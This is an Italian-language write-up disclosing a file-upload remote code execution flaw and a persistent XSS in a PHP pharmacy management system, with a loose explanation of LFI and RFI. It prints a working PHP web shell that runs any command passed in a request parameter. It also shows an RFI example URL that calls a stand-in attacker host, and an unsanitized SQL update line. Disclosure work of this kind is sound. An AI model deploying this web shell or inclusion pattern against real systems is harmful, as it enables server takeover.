
Questa applicazione è stata realizzata da Mayurik Il progetto del sistema di gestione farmaceutica in PHP è stato sviluppato per migliorare l'accuratezza e l'efficienza dei negozi farmaceutici attraverso la sicurezza e la gestione. In breve, è un'applicazione di inventario dei prodotti.
È stato scoperto che Pharmacy Management System v1.0 contiene una vulnerabilità di esecuzione di codice remoto (RCE) tramite il componente "/php_action/editProductImage.php". Questa vulnerabilità consente agli aggressori di eseguire codice arbitrario tramite un file immagine appositamente predisposto.
Le vulnerabilità di File Upload sono di solito una vulnerabilità che permette l'esecuzione di uno script. Funziona quando carichiamo il file sul server e inseriamo un comando sul file caricato. Le vulnerabilità di file upload sono divise in due tipi:
Questa vulnerabilità si verifica quando i file locali sul server includono il file recuperato dall'utente. I valori ricevuti dall'utente devono essere sterilizzati.
Esempio di LFI (Inclusione Locale di File) ;
<?php
if($_REQUEST['s'])
{
system($_REQUEST['s']);
}
else
phpinfo();?>
Questa vulnerabilità funziona quando l'aggressore carica malware da un server remoto.
Esempio di RFI (Inclusione Remota di File) ;
"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

Esempio di script shell php;
<?php
if($_REQUEST['s'])
{
system($_REQUEST['s']);
}
else
phpinfo();?>
Richiesta;

Risposta;

Richiesta;

Risposta;


Inoltre, questa vulnerabilità è ancora attiva nell'applicazione.
Nella stessa pagina, "editproduct.php", ho trovato una XSS persistente
$sql = "UPDATE product SET product_name = '$productName'
In questo blocco di codice puoi uscire dal contesto con le virgolette doppie (")



Spero di essere riuscito a spiegare come funziona la vulnerabilità di file inclusion, quali situazioni la innescano e come prevenire questo attacco da parte degli aggressori. Grazie per il vostro prezioso tempo.